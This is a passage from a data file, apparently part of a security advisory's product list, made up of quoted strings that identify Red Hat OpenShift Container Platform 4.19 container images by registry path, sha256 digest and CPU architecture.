"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:46f5aedf9bffb142d8da9d0420180b95e658101190b32ce1c86da1c53c1111bc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:718a20a7c4b91391c72ed16452d3dd0fcf667ce3912cdcb96d4d5cb0b476958a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:8a660d559fa1d4b5facdaebe5a55bb8706cc0f098591d3552446d45b533adf81_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-coredns-rhel9@sha256:fcf9efa15997c8fa9dc9a1681ac14ea46e0e959cf4a33933440103715b2c6617_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:75f4a2547e299c901ce632bc3f7770717b0b52a5d3fe79b4687406ff05490e0b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9-operator@sha256:96d19a18b20a9e8ed81918aa1ad3b12e7a8ed4786f3d655d3e6c61a1362c5ea5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:6171572cbb98e637db55e72ae4f00bf1e64166e65485825c83bdf6031339f581_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-manila-rhel9@sha256:8524355b257cafb5460396c2b2f85eaa803c7bdaeaf31d5eb55528917eb94d47_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:3733c9a79c632dda29eb7635740f4ab45234207be76bf6689fe75037a941fd1f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-driver-nfs-rhel9@sha256:fdf560dc1b05690089f38a02e103c01be9156c4a5bb6c4d8faae4111e27aa92b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:1045e8dc9ce690faf4cf4868b2c8ab4984d26887ff2d8d7390cad475099d6226_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:3de13524a55ba2dd2013834445ad7d04de251303e67cd49df82a1274c4e5d5df_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:6eac8f9c6ff815dc2113652386ea7a0905e7ab0a008d2d89dba5d9bed116b61d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-attacher-rhel9@sha256:eec95e6623fd06e16ba393b102f2cfb268037e4379743423093d56fe2fc42dea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:076a61f04e000b8c1c6d3192342a3112905e9ea05b2c060d6b68b1da0c7c2ca0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:75bdfd4e0a6c82ae908e82835b11447b4af89bbfcfe7544c9aeff54adf2452a2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:7715c2111abc77e11b7544eb351b9799d0d0fc029958e34680673d225581bdbd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-provisioner-rhel9@sha256:9c354366074059d7be301b438cec1791479ced4f77a1b3702552755a12d4de32_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:385e609692f2d6ba0f6512eca051371f15471d6a4ac86de4fdeb2059c1cb9ddc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5aa042fbd253a7e644468a8a6a7df06a206bb5556ba4d2e0bf36a12bfeaf1bd4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5f47a5d1025b8499572c93c4fbd1c8596e8afb2291a3408db77bb0d475b179a6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-resizer-rhel9@sha256:5ff1fab804d261aa3ef884e9288eadaea59bf40a26face259decb7e3a686a85f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:15fa093433263f5b73be4d59d0bbadaa6f0201f0d8bb0e72ed4187db8ebd4ecd_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:58059ecb3d457599d000a7a113b943e53bfdaed0225b6df8cda9ff83f1c30b21_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:5f723bb5d81abb468b45850e894aa3f719cbac259b5a425b1abf3fffba3d7866_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-external-snapshotter-rhel9@sha256:fb63e1f96831506bc79fbdd4f78ee9da3913f86f128f538db70a8badc23ac854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:07a5ff47f0ddbc7ac2293a6f6af6ed2a9cb4027e7ad61042863187df69babda3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
